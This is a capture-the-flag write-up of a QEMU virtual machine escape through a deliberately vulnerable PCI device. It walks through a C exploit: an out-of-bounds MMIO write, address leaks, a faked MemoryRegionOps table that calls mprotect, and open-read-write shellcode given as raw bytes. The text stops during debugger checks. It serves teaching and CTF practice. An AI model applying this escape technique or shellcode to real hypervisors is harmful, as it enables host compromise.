Quememu

25 minutes to read

In this challenge they give us a PCI device (Peripheral Component interconnect) that communicates by MMIO (Memory-mapped I/O). This device has been added to the qemu codebase and they also give us the compiled binary and a diff.txt file with the added differences:

# ls -l
total 90964
-rw-rw-r--  1 root root      718 Feb 13 21:42 Dockerfile
-rwxrwxr-x  1 root root       59 Feb 13 21:42 deploy_docker.sh
-rw-rw-r--  1 root root     5494 Feb 13 21:41 diff.txt
-rw-rw-r--  1 root root      151 Feb 13 21:42 docker-compose.yml
-rw-rw-r--  1 root root       26 Feb 13 21:42 flag
-rw-r--r--  1 root root  1320526 Feb 13 21:43 initramfs.cpio.gz
drwxrwxr-x  7 root root     4096 Feb 13 21:43 pc-bios
-rwxrwxr-x  1 root root 76179320 Feb 13 21:43 qemu-system-x86_64
-rwxrwxr-x  1 root root      331 Feb 13 21:43 run.sh
-rw-------  1 root root 11614792 Feb 13 21:42 vmlinuz-5.15.0-92-generic
-rw-rw-r--  1 root root      176 Feb 13 21:42 xinetd

In the differences, we can see the file quememu.c, which represents the source code of the vulnerable device. In this challenge we have to exploit the vulnerable PCI device to escape qemu.

Setup environment

The environment configuration is similar to kernel exploitation challenges, since we have to compile an exploit in C and put it in initramfs. This directory is compressed and passed to qemu.

To be able to work more comfortably, we can use a script go.sh like the next to compile, compress and launch qemu in one hit:

#!/usr/bin/env bash

musl-gcc -s -static -o exploit $1 || exit
mv exploit initramfs/
cd initramfs
find . -print0 | cpio --null -ov --format=newc | gzip -9 > initramfs.cpio.gz
mv initramfs.cpio.gz ..
cd ..

sh run.sh

The exploit is compiled statically with musl-gcc because it generates smaller compiled binaries and without external library dependencies. For this, it is necessary to install it using apt install musl-tools.

In the qemu script (run.sh) we need to modify the paths to the files vmlinuz, initramfs.cpio.gz and pc-bios. And it is possible that an error appears when executing qemu related to the library version SLIRP 4.7. If this appears, the best option is to take the library from the Docker container that comes with the challenge (using docker cp, for example):

docker cp <container-id>:/usr/lib/x86_64-linux-gnu/libslirp.so.0.4.0 .

Source code analysis

The quememu device uses the following structure:

typedef struct {
  PCIDevice pdev;
  MemoryRegion mmio;
  char buff[BUFF_SIZE];
  struct {
    base_t base;
    short off;
    hwaddr src; 
  } state;
} QueMemuState;

And allows us to read and write values of this structure (buff, base, off, src) using the functions below:

static uint64_t quememu_mmio_read(void *opaque, hwaddr addr, unsigned size) {
    QueMemuState *quememu = (QueMemuState *) opaque;
    uint64_t val = 0;

    switch (addr) {
    case 0x00:
      trigger_rw(quememu, 1);
      break;
    case 0x04:
      val = quememu->state.base;
      break;
    case 0x08:
      val = quememu->state.off;
      break;
    case 0x0c:
      val = quememu->state.src;
      break;
    default:
      val = 0xFABADA;
      break;
    }

    return val;
}

static void quememu_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
    QueMemuState *quememu = (QueMemuState *) opaque;

    switch (addr) {
    case 0x00:
      trigger_rw(quememu, 0);
      break;
    case 0x04:
      if ((base_t) val <= MAX_BASE) quememu->state.base = val;
      break;
    case 0x08:
      if ((short) val >= 0) quememu->state.off = val;
      break;
    case 0x0c:
      quememu->state.src = val;
      break;
    default:
      break;
    }
}

The trigger_rw function is the one that really reads or writes in the device’s memory:

static void trigger_rw(QueMemuState *quememu, bool is_write) {
  if (quememu->state.base == 0) {
    return;
  }

  // Don't change base cause we already use base 16
  if (quememu->state.base == 0x10) { 
    cpu_physical_memory_rw(quememu->state.src, &quememu->buff[quememu->state.off], MAX_RW, is_write);
    return;
  }

  unsigned short n = quememu->state.off;
  unsigned long long multiplier = 1;
  unsigned long long new_off = 0;

  for (int i = 0; i < sizeof(n) * 2; ++i) {
    // Use nibble % base (e.g. 7 in base 3 = 1)
    new_off += (consume_nibble(&n) % quememu->state.base) * multiplier; 
    multiplier *= quememu->state.base;
  }

  cpu_physical_memory_rw(quememu->state.src, &quememu->buff[new_off], MAX_RW, is_write);
}

And the consume_nibble function returns the least significant 4 bits of the number and that the same number is right-shifted 4 bits:

static unsigned char consume_nibble(unsigned short *n) {
  unsigned char nibble = *n << 4;
  nibble = nibble > >4;
  *n = *n >> 4;

  return nibble;
}

It is also important to look at the constants and type definitions:

#define TYPE_PCI_QUEMEMU_DEVICE "quememu"
#define QUEMEMU_MMIO_SIZE 0x10000
#define BUFF_SIZE 0x10000
#define MAX_BASE 20
#define MAX_RW BUFF_SIZE - (pow(MAX_BASE, 3) * 0x7 + pow(MAX_BASE, 2) * 0xF + MAX_BASE * 0xF + 0xF - 1)

typedef unsigned char base_t;

A suspicious line is the following:

#define MAX_RW BUFF_SIZE - (pow(MAX_BASE, 3) * 0x7 + pow(MAX_BASE, 2) * 0xF + MAX_BASE * 0xF + 0xF - 1)

It is a weird expression, because they could have simply put the result of the operation. If we look closely, the value in MAX_RW is:

This number corresponds to 0x7FFE in base 20. The (numerical base) radix is something particular of this challenge, since it lets us configure the offset in which to write based on a radix.

Vulnerability

However, the vulnerability of this device is in the term of the previous expression. The thing is that the maximum offset that we can put is 0x7FFF (in hexadecimal), since the attribute off is short (signed) and it is verified that it is a non-negative number:

    case 0x08:
      if ((short) val >= 0) quememu->state.off = val;
      break;

But if we use radix 20 (which is the maximum that we can use), then the new offset will be:

And so, we have:

and therefore,

With this new offset, if we write, we will be writing from to , that is, up to . And here we have a out-of-bounds (OOB).

Actually, it is an OOB for reading and writing, but for reading it is not interesting. On the other hand, writing OOB gives us the power to change the base attribute without no limitation. This happens because the base attribute is just after buff in the structure:

typedef struct {
  PCIDevice pdev;
  MemoryRegion mmio;
  char buff[BUFF_SIZE];
  struct {
    base_t base;
    short off;
    hwaddr src; 
  } state;
} QueMemuState;

Exploit strategy

Once we can change the base attribute to whatever value, we can get a much greater OOB. For example, if we set radix 21 and off to 0x7fff, The new offset will be

Obviously, this offset does not help us much, because we go out of the limits. But we might think about our goal and then define a more appropriate offset for it.

When reviewing other qemu escape challenges such as Full Chain - Wall Maria from HITCON CTF 2023, we see that a good goal is the MemoryRegion structure in the mmio attribute. The difference between this challenge and Full Chain - Wall Maria is that the position of mmio in the structure of the device changes. In this case, mmio is above buff, so we need a negative value inside off to be able to modify it.

So, the minimum OOB we need is simply 2 bytes more than we have without making any modification. We can look for the value we need using Python:

>>> BUFF_SIZE = 0x10000
>>> MAX_BASE = 20
>>> MAX_RW = BUFF_SIZE - (pow(MAX_BASE,3)*0x7 + pow(MAX_BASE,2)*0xF + MAX_BASE*0xF + 0xF - 1)
3222
>>> b = 20
>>> hex(0x7 * b ** 3 + 0xf * b ** 2 + 0xf * b ** 1 + 0xf * b ** 0 + MAX_RW)
'0x10001'
>>>
>>> b = 21
>>> hex(0x6 * b ** 3 + 0xf * b ** 2 + 0x6 * b ** 1 + 0xa * b ** 0 + MAX_RW)
'0x10003'

Ok, then the value 0x6f6a in radix 21 will allow us a to get a 3-byte OOB, just to overwrite base (1 byte) and off (2 bytes) fields.

Once we get to read/write mmio, it is more or less simple to continue. We can obtain memory addresses from qemu and write a ROP chain or a pointer to some shellcode in a function table to read the flag.

Clarifications

Before starting to write, it is necessary to understand certain concepts:

First, to communicate with the PCI device using MMIO, we will create a region of memory with mmap which will be linked to the device. In this way, every time we read/write, the device will perform a certain action
On the other hand, the buff attribute used by the PCI device corresponds to a physical memory address. We must find a virtual memory address that matches this physical address, so that we can use the buffer of the device
To open the device, we can launch qemu and list PCI devices. With this, we look for what we want to exploit by looking at the identifiers that appear in the source code :

   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # lspci
00:01.0 Class 0601: 8086:7000
00:04.0 Class 00ff: 1234:face
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:03.0 Class 0200: 8086:100e
00:01.1 Class 0101: 8086:7010
00:02.0 Class 0300: 1234:1111
/root # cat /sys/devices/pci0000:00/0000:00:04.0/device
0xface
/root # ls /sys/devices/pci0000:00/0000:00:04.0/
ari_enabled               irq                       resource
broken_parity_status      link                      resource0
class                     local_cpulist             revision
config                    local_cpus                subsystem
consistent_dma_mask_bits  modalias                  subsystem_device
d3cold_allowed            msi_bus                   subsystem_vendor
device                    numa_node                 uevent
dma_mask_bits             power                     vendor
driver_override           power_state               waiting_for_supplier
enable                    remove
firmware_node             rescan

The file we will use in the exploit is resource0.

The program we have to exploit is qemu. Therefore, to debug, we can use two points of view: the qemu and the exploit that will be inside qemu

Exploit development

To start, we will write the following auxiliary functions:

uint8_t* mmio_mem;


void mmio_write(uint32_t addr, uint32_t value) {
  *(uint32_t*) (mmio_mem + addr) = value;
}

uint32_t mmio_read(uint32_t addr) {
  return *(uint32_t*) (mmio_mem + addr);
}

void set_buff() {
  mmio_write(0x00, 0);
}

void set_base(uint32_t src) {
  mmio_write(0x4, src);
}

void set_off(uint32_t off) {
  mmio_write(0x8, off);
}

void set_src(uint32_t base) {
  mmio_write(0xc, base);
}

uint32_t get_buff() {
  return mmio_read(0x0);
}

uint32_t get_base() {
  return mmio_read(0x4);
}

uint32_t get_off() {
  return mmio_read(0x8);
}

uint32_t get_src() {
  return mmio_read(0xc);
}

These functions allow us to read and write attributes in the PCI device structure. It may seem strange how mmio_read and mmio_write work. The key is that when performing a write operation in mmio_mem, the PCI device itself “will wake up” and will execute the corresponding function. And if we read in mmio_mem, another device function will be executed.

Interaction with the PCI device

To open the device and configure the memory region mmio_mem, we can do the following:

int main() {
  int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);

  if (mmio_fd < 0) {
    fprintf(stderr, "[!] Cannot open device\n");
    exit(1);
  }

  mmio_mem = mmap(NULL, 4 * PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
  
  if (mmio_mem == MAP_FAILED) {
    fprintf(stderr, "[!] mmio error\n");
    exit(1);
  }

And to see that we are actually interacting with the device, we can do the following tests:

  set_off(0);
  set_base(0x10);

  printf("[*] buff    ==> %x\n", get_buff());
  printf("[*] base    ==> %d\n", get_base());
  printf("[*] off     ==> 0x%hx\n", get_off());
  printf("[*] src     ==> %x\n", get_src());
  printf("[*] default ==> 0x%x\n\n", mmio_read(0x10));

# sh go.sh exploit.c
...

Booting from ROM..
   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # /exploit
[*] buff    ==> 0
[*] base    ==> 16
[*] off     ==> 0x0
[*] src     ==> 0
[*] default ==> 0xfabada

As can be seen, we have data that clearly comes from the device, such as 0xfabada, which is something that we have not explicitly written in mmio_mem. This happens because we have executed the read function with a val that is not managed, and that is why 0xfabada is shown by default.

Great, now we have to map the buff attribute. For this, we need a function that finds the physical memory address of a virtual memory address (taken from nobodyisnobody):

uint64_t gva2gpa(void *addr) {
  uint64_t page = 0;
  int fd = open("/proc/self/pagemap", O_RDONLY);

  if (fd < 0) {
    fprintf(stderr, "[!] open error in gva2gpa\n");
    exit(1);
  }

  lseek(fd, ((uint64_t) addr / PAGE_SIZE) * 8, SEEK_SET);
  read(fd, &page, 8);

  return ((page & 0x7fffffffffffff) * PAGE_SIZE) | ((uint64_t) addr & 0xfff);
}

And now, we have to map a page and find that the physical and virtual addresses also coincide with adjacent pages. This can be adapted from nobodyisnobody’s exploit:

  system("sysctl vm.nr_hugepages=32");  // Set huge page

  char *buff;
  uint64_t buff_gpa;

  while (1) {
    buff = mmap(0, 0x10 * PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS | MAP_NONBLOCK, -1, 0);

    if (buff < 0) {
      fprintf(stderr, "[!] cannot mmap buff\n");
      exit(1);
    }

    memset(buff, 0, 0x10 * PAGE_SIZE);
    buff_gpa = gva2gpa(buff);

    if (buff_gpa + PAGE_SIZE == gva2gpa(buff + PAGE_SIZE)) {
      break;
    }
  }

  printf("[*] buff virtual address  = %p\n", buff);
  printf("[*] buff physical address = %p\n\n", (void*) buff_gpa);

At this point, we can already configure the PCI device to start exploiting it. Recall that we use radix 20 and the maximum offset to get a 1-byte OOB write:

  set_src(buff_gpa);
  set_base(20);
  set_off(0x7fff);

  printf("[*] base ==> %d\n", get_base());
  printf("[*] off  ==> 0x%hx\n\n", get_off());

And we see that the parameters are alright:

   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # /exploit
vm.nr_hugepages = 32
[*] buff virtual address  = 0x7f9a069c9000
[*] buff physical address = 0xb3e6000

[*] base ==> 20
[*] off  ==> 0x7fff

Now, we proceed to change base attribute in an “artificial” way, without using the functions of the PCI device:

  // modify base with OOB write
  memset(buff, 0, MAX_RW);
  buff[MAX_RW - 1] = 21;
  set_buff();

  printf("[+] base ==> %d\n\n", get_base());

If we execute the exploit again, we see that the base attribute has changed as we expected:

   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # /exploit
vm.nr_hugepages = 32
[*] buff virtual address  = 0x7fde2d468000
[*] buff physical address = 0x3ffd8000

[*] base ==> 20
[*] off  ==> 0x7fff

[+] base ==> 21

Perfect, the following is to use an offset of 0x6f6a, which will give us a 3-byte OOB to modify the off attribute in an “artificial” way. In fact, after testing, I discovered that the appropriate value was 0x6f6b, which gives us a 4-byte OOB, which is necessary in this case:

  // modify off with OOB write
  set_off(0x6f6b);
  printf("[*] off  ==> 0x%hx\n\n", get_off());

  buff[MAX_RW - 4] = 0x10;
  buff[MAX_RW - 3] = 0;
  buff[MAX_RW - 2] = 0x00;
  buff[MAX_RW - 1] = 0xfe;

  set_buff();

  printf("[+] base ==> %d\n", get_base());
  printf("[+] off  ==> 0x%hx\n\n", get_off());

And as you can see, we already have a negative value in off (specifically, -0x100, which is more than enough to access mmio).On the other hand, we have taken advantage and we have also put radix 16 again:

   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # /exploit
vm.nr_hugepages = 32
[*] buff virtual address  = 0x7f9f8de69000
[*] buff physical address = 0x327e5000

[*] base ==> 20
[*] off  ==> 0x7fff

[+] base ==> 21

[*] off  ==> 0x6f6b

[+] base ==> 16
[+] off  ==> 0xfe00

Leaking memory addresses

The next thing we can do is use the OOB read to access the mmio attribute (MemoryRegion structure). For this, we tell the device to read from its region of physical memory and put the result in our virtual buffer. Next, what we do is interpret the data as uint64_t and print several values:

  get_buff();

  uint64_t* data = (uint64_t*) buff;

  for (int i = 0; i < 80; i++) {
    printf("%d: %lx\n", i, data[i]);
  }

This is the result:

   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # /exploit
vm.nr_hugepages = 32
[*] buff virtual address  = 0x7f50e1ae5000
[*] buff physical address = 0xb9e8000

[*] base ==> 20
[*] off  ==> 0x7fff

[+] base ==> 21

[*] off  ==> 0x6f6b

[+] base ==> 16
[+] off  ==> 0xfe00

0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
55a2dae78d90
0
55a2dbd16f60
1
55a2dbda4a70
1
0
0
55a2dbda4a70
55a2dbda4a70
55a2d9a79460
55a2dbda4a70
55a2dae4aae0
0
10000
0
febb0000
55a2d8c7f320
0
10001
0
0
1
0
55a2dbda5558
55a2dbd745e0
55a2dae4ab98
0
55a2dbda5578
55a2dbd696a0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0

We see a few pointers there. To identify them, we can analyze the MemoryRegion structure. Another option is to look for the pointer to mmio->ops. For this, we can use readelf on the qemu binary:

# readelf -s qemu-system-x86_64 | grep quememu
0000000000000000     0 FILE    LOCAL  DEFAULT  ABS quememu.c
00000000004282b0    16 FUNC    LOCAL  DEFAULT   16 pci_quememu_regi[...]
00000000014f73e0   104 OBJECT  LOCAL  DEFAULT   24 quememu_info.4
0000000000428360   118 FUNC    LOCAL  DEFAULT   16 quememu_mmio_write
00000000004283e0   125 FUNC    LOCAL  DEFAULT   16 quememu_mmio_read
0000000000428460   108 FUNC    LOCAL  DEFAULT   16 pci_quememu_realize
00000000014f7460    80 OBJECT  LOCAL  DEFAULT   24 quememu_mmio_ops
00000000004284d0   152 FUNC    LOCAL  DEFAULT   16 quememu_class_init
0000000000428570    73 FUNC    LOCAL  DEFAULT   16 quememu_instance_init

# readelf -s qemu-system-x86_64 | grep quememu_mmio_ops
00000000014f7460    80 OBJECT  LOCAL  DEFAULT   24 quememu_mmio_ops

There we see that the last three hexadecimal digits are 460, and coincide with the 40 index of the above list. So, we have the offset and the index in the array. With this we can calculate the base address of qemu (which has PIE).

Another important index is the one of parent_obj, which is 30. With this index we have the relationship between our buffer and the device’s buffer (in other words, its 0 is our 30) index.

It would also be nice to have the address in which the buffer is located in qemu. For that, we can put a getchar instruction in the code and then add GDB to the process. But before, we are going to put the data we already have:

#define QUEMEMU_MMIO_OPS_OFFSET 0x14f7460
#define QUEMEMU_MMIO_OPS_INDEX 40
#define QUEMEMU_MMIO_OPAQUE_INDEX 41
#define QUEMEMU_MMIO_PARENT_OBJ_INDEX 30

  uint64_t qemu_base_addr = data[QUEMEMU_MMIO_OPS_INDEX] - QUEMEMU_MMIO_OPS_OFFSET;
  printf("[+] qemu base address: 0x%lx\n", qemu_base_addr);

  getchar();

   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # /exploit
vm.nr_hugepages = 32
[*] buff virtual address  = 0x7f30a81bb000
[*] buff physical address = 0x2abf3000

[*] base ==> 20
[*] off  ==> 0x7fff

[+] base ==> 21

[*] off  ==> 0x6f6b

[+] base ==> 16
[+] off  ==> 0xfe00

0: 0
...
29: 0
30: 5614b174cd90
31: 0
32: 5614b25eaf60
33: 1
34: 5614b2678a70
35: 1
36: 0
37: 0
38: 5614b2678a70
39: 5614b2678a70
40: 5614b0eaf460
41: 5614b2678a70
42: 5614b171eae0
43: 0
44: 10000
45: 0
46: febb0000
47: 5614b00b5320
48: 0
49: 10001
50: 0
51: 0
52: 1
53: 0
54: 5614b2679558
55: 5614b26485e0
56: 5614b171eb98
57: 0
58: 5614b2679578
59: 5614b263d6a0
60: 0
...
79: 0
[+] qemu base address: 0x5614af9b8000

The first thing we can check is whether the base address of qemu is correct:

# gdb -q -p $(pidof qemu-system-x86_64) qemu-system-x86_64

gef> vmmap qemu
[ Legend:  Code | Heap | Stack | Writable | ReadOnly | None | RWX ]
Start              End                Size               Offset             Perm Path
0x00005614af9b8000 0x00005614afcd1000 0x0000000000319000 0x0000000000000000 r-- /root/HackOn/Quememu/qemu-system-x86_64
0x00005614afcd1000 0x00005614b0342000 0x0000000000671000 0x0000000000319000 r-x /root/HackOn/Quememu/qemu-system-x86_64
0x00005614b0342000 0x00005614b0692000 0x0000000000350000 0x000000000098a000 r-- /root/HackOn/Quememu/qemu-system-x86_64
0x00005614b0692000 0x00005614b1069000 0x00000000009d7000 0x0000000000cd9000 r-- /root/HackOn/Quememu/qemu-system-x86_64
0x00005614b1069000 0x00005614b117f000 0x0000000000116000 0x00000000016b0000 rw- /root/HackOn/Quememu/qemu-system-x86_64

Now, we can search for references to the mmio->ops address to find the mmio structure of the device:

gef> find 0x5614b0eaf460
[+] Searching '\x60\xf4\xea\xb0\x14\x56' in whole memory
[+] In '[heap]' (0x5614b1607000-0x5614b28ab000 [rw-])
  0x5614b26794f0:    60 f4 ea b0 14 56 00 00  70 8a 67 b2 14 56 00 00    |  `....V..p.g..V..  |
[+] In (0x7f45c1e00000-0x7f4601e00000 [rw-])
  0x7f45ec9f3140:    60 f4 ea b0 14 56 00 00  70 8a 67 b2 14 56 00 00    |  `....V..p.g..V..  |

Now, we know more or less where the structure is:

gef> x/30gx 0x5614b26794f0
0x5614b26794f0: 0x00005614b0eaf460      0x00005614b2678a70
0x5614b2679500: 0x00005614b171eae0      0x0000000000000000
0x5614b2679510: 0x0000000000010000      0x0000000000000000
0x5614b2679520: 0x00000000febb0000      0x00005614b00b5320
0x5614b2679530: 0x0000000000000000      0x0000000000010001
0x5614b2679540: 0x0000000000000000      0x0000000000000000
0x5614b2679550: 0x0000000000000001      0x0000000000000000
0x5614b2679560: 0x00005614b2679558      0x00005614b26485e0
0x5614b2679570: 0x00005614b171eb98      0x0000000000000000
0x5614b2679580: 0x00005614b2679578      0x00005614b263d6a0
0x5614b2679590: 0x0000000000000000      0x0000000000000000
0x5614b26795a0: 0x0000000000000000      0x0000000000000000
0x5614b26795b0: 0x0000000000000000      0x0000000000000000
0x5614b26795c0: 0x0000000000000000      0x0000000000000000
0x5614b26795d0: 0x0000000000000000      0x0000000000000000
gef> x/30gx 0x5614b26794f0 - 0x80
0x5614b2679470: 0x0000000000000000      0x0000000000000000
0x5614b2679480: 0x0000000000000000      0x0000000000000000
0x5614b2679490: 0x0000000000000000      0x0000000000000000
0x5614b26794a0: 0x00005614b174cd90      0x0000000000000000
0x5614b26794b0: 0x00005614b25eaf60      0x0000000000000001
0x5614b26794c0: 0x00005614b2678a70      0x0000000000000001
0x5614b26794d0: 0x0000000000000000      0x0000000000000000
0x5614b26794e0: 0x00005614b2678a70      0x00005614b2678a70
0x5614b26794f0: 0x00005614b0eaf460      0x00005614b2678a70
0x5614b2679500: 0x00005614b171eae0      0x0000000000000000
0x5614b2679510: 0x0000000000010000      0x0000000000000000
0x5614b2679520: 0x00000000febb0000      0x00005614b00b5320
0x5614b2679530: 0x0000000000000000      0x0000000000010001
0x5614b2679540: 0x0000000000000000      0x0000000000000000
0x5614b2679550: 0x0000000000000001      0x0000000000000000

There we can identify the pointer to parent_obj, which is the one that begins the structure:

gef> x/50gx 0x5614b26794a0
0x5614b26794a0: 0x00005614b174cd90      0x0000000000000000
0x5614b26794b0: 0x00005614b25eaf60      0x0000000000000001
0x5614b26794c0: 0x00005614b2678a70      0x0000000000000001
0x5614b26794d0: 0x0000000000000000      0x0000000000000000
0x5614b26794e0: 0x00005614b2678a70      0x00005614b2678a70
0x5614b26794f0: 0x00005614b0eaf460      0x00005614b2678a70
0x5614b2679500: 0x00005614b171eae0      0x0000000000000000
0x5614b2679510: 0x0000000000010000      0x0000000000000000
0x5614b2679520: 0x00000000febb0000      0x00005614b00b5320
0x5614b2679530: 0x0000000000000000      0x0000000000010001
0x5614b2679540: 0x0000000000000000      0x0000000000000000
0x5614b2679550: 0x0000000000000001      0x0000000000000000
0x5614b2679560: 0x00005614b2679558      0x00005614b26485e0
0x5614b2679570: 0x00005614b171eb98      0x0000000000000000
0x5614b2679580: 0x00005614b2679578      0x00005614b263d6a0
0x5614b2679590: 0x0000000000000000      0x0000000000000000
0x5614b26795a0: 0x0000000000000000      0x0000000000000000
0x5614b26795b0: 0x0000000000000000      0x0000000000000000
0x5614b26795c0: 0x0000000000000000      0x0000000000000000
0x5614b26795d0: 0x0000000000000000      0x0000000000000000
0x5614b26795e0: 0x0000000000000000      0x0000000000000000
0x5614b26795f0: 0x0000000000000000      0x0000000000000000
0x5614b2679600: 0x0000000000000000      0x0000000000000000
0x5614b2679610: 0x0000000000000000      0x0000000000000000
0x5614b2679620: 0x0000000000000000      0x0000000000000000

And here we see a pointer in position 0x5614b2679580 that has a value of 0x5614b2679578 (almost the same as the address in which it is). This value appears in the 58 index of the array. We can use this value to calculate the exact address of the mmio structure:

  uint64_t qemu_base_addr = data[QUEMEMU_MMIO_OPS_INDEX] - QUEMEMU_MMIO_OPS_OFFSET;
  uint64_t mmio_base_addr = data[QUEMEMU_MMIO_ADDRESS_INDEX] - 0xd8;
  printf("[+] qemu base address: 0x%lx\n", qemu_base_addr);
  printf("[+] mmio base address: 0x%lx\n\n", mmio_base_addr);

Arbitrary code execution

At this point, we have control over the mmio->ops address, which currently contains the following function table:

gef> p quememu_mmio_ops
$1 = {
  read = 0x5614afde03e0 <quememu_mmio_read>,
  write = 0x5614afde0360 <quememu_mmio_write>,
  read_with_attrs = 0x0,
  write_with_attrs = 0x0,
  endianness = DEVICE_NATIVE_ENDIAN,
  valid = {
    min_access_size = 0x4,
    max_access_size = 0x4,
    unaligned = 0x0,
    accepts = 0x0
  },
  impl = {
    min_access_size = 0x4,
    max_access_size = 0x4,
    unaligned = 0x0
  }
}

What we can do is create a fake MemoryRegionOps structure in the buffer and make mmio->ops point to it. So, every time a read or write is executed, the device will execute the functions that we tell it, and not those defined in the module.

In this situation, we have two options:

Use a ROP chain to run open-read-write instructions to read the flag
Use open-read-write shellcode to read the flag and make it executable with mprotect

The first option is not very affordable here because there are no good gadgets to make a Stack Pivot, so we will use the second option.

The key here is to put mprotect in the write function, since we have the ability to control $rdi, $rsi and $rdx (the first three arguments of a call to a function). To set $rdi, we have to change the value of opaque (which is next to the mmio->ops pointer). Then, $rsi is the value of val when executing the write function, and $rdx is the address in which we write.

We could be tempted to run system("/bin/sh"), but we can’t because there are seccomp rules that block it.

So, with this we can create a shellcode as the following (it would be necessary to modify it for the remote execution, since the flag is found in /home/user/flag):

pop  rbx
xor  rsi, rsi
xor  rax, rax
push rsi
push rsi
mov  rdi, 0x67616c66  # "flag" as hexadecimal number
push rdi
mov  rdi, rsp
mov   al, 2
syscall               # int fd = open("flag", 0);

mov   dl, 0x64
mov  rsi, rsp
xor  edi, eax
xor   al, al
syscall               # read(fd, data, 0x64);

mov   al, 1
mov  rdi, rax
syscall               # write(1, data, 0x64);

pop  rax
pop  rax
pop  rax
push rbx
ret

Using pwntools.asm we can get the shellcodes as a list of bytes. And now we put it in the exploit, and by the way, we copy it in the virtual buffer at an arbitrary offset:

  uint8_t shellcode[] = { 91, 72, 49, 246, 72, 49, 192, 86, 86, 72, 199, 199, 102, 108, 97, 103, 87, 72, 137, 231, 176, 2, 15, 5, 72, 199, 194, 100, 0, 0, 0, 72, 137, 230, 137, 199, 48, 192, 15, 5, 176, 1, 72, 137, 199, 15, 5, 88, 88, 88, 83, 195 };
  memcpy(data + 0x80, shellcode, sizeof(shellcode));

On the other hand, we have to take out the offset of mprotect in the PLT of qemu to be able to call the function:

# objdump -M intel -d qemu-system-x86_64 | grep mprotect@plt
000000000031fff0 <mprotect@plt>:
  424ed1:       e8 1a b1 ef ff          call   31fff0 <mprotect@plt>
  424ee2:       e8 09 b1 ef ff          call   31fff0 <mprotect@plt>
  8fa39e:       e8 4d 5c a2 ff          call   31fff0 <mprotect@plt>
  900564:       e8 87 fa a1 ff          call   31fff0 <mprotect@plt>
  9327b6:       e8 35 d8 9e ff          call   31fff0 <mprotect@plt>

And so, we have the address of mprotect:

  uint64_t mprotect_plt_addr = qemu_base_addr + MPROTECT_PLT_OFFSET;

The last thing left is to create our fake MemoryRegionOps structure, modify the mmio->ops pointer and set the new value of opaque:

  data[QUEMEMU_MMIO_OPS_INDEX] = mmio_base_addr + (70 - QUEMEMU_MMIO_PARENT_OBJ_INDEX) * 8;
  data[QUEMEMU_MMIO_OPAQUE_INDEX] = mmio_base_addr & ~0xfff;
  data[70] = mmio_base_addr + (0x80 - QUEMEMU_MMIO_PARENT_OBJ_INDEX) * 8;
  data[71] = mprotect_plt_addr;

  set_buff();

As points to highlight, the fake MemoryRegionOps structure is placed at index 70. That is, the read function in the 70 index and the write function in the 71 index. And as expected, one contains the address of the shellcode and the other has the address of mprotect in the PLT, respectively.

Another interesting point is that the address that goes into opaque is the base address of the mmio structure, zeroing the last three hexadecimal digits to have a valid memory page.

Finally, note how the relationship between our indexes and those of the device is relevant to put the right values where we want.

Once executed set_buff, the structure should have changed. We can check it in GDB:

gef> x/50gx 0x56119210c4a0
0x56119210c4a0: 0x00005611911dfd90      0x0000000000000000
0x56119210c4b0: 0x000056119207df60      0x0000000000000001
0x56119210c4c0: 0x000056119210ba70      0x0000000000000001
0x56119210c4d0: 0x0000000000000000      0x0000000000000000
0x56119210c4e0: 0x000056119210ba70      0x000056119210ba70
